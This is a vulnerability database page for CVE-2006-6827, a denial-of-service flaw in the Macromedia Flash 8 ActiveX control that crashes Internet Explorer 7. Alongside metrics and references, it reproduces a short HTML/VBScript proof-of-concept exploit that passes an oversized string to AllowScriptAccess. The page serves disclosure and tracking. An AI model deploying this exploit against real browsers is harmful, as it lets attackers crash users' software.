CVE-2006-6827 : Detail

CVE-2006-6827

3.35%V3
Network
2007-01-01
22h00 +00:00
2017-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Flash8b.ocx in Macromedia Flash 8 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long string in the Flash8b.AllowScriptAccess method.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3041

Publication date : 2006-12-28 23h00 +00:00
Author : shinnai
EDB Verified : Yes

<!-- -------------------------------------------------------------------------- Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 --------------------------------------------------------------------------- --> <html> <object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object> <script language='vbscript'> argCount = 1 arg1=String(1000000, "A") Flash8b.AllowScriptAccess=arg1 </script> # milw0rm.com [2006-12-29]

Products Mentioned

Configuraton 0

Macromedia>>Flash_player >> Version 8.0

Macromedia>>Flash_player >> Version 8.0.22.0

Macromedia>>Flash_player >> Version 8.0.24.0

Macromedia>>Flash_player >> Version 8.0.33.0

References

http://www.securityfocus.com/bid/21818
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/3041
Tags : exploit, x_refsource_EXPLOIT-DB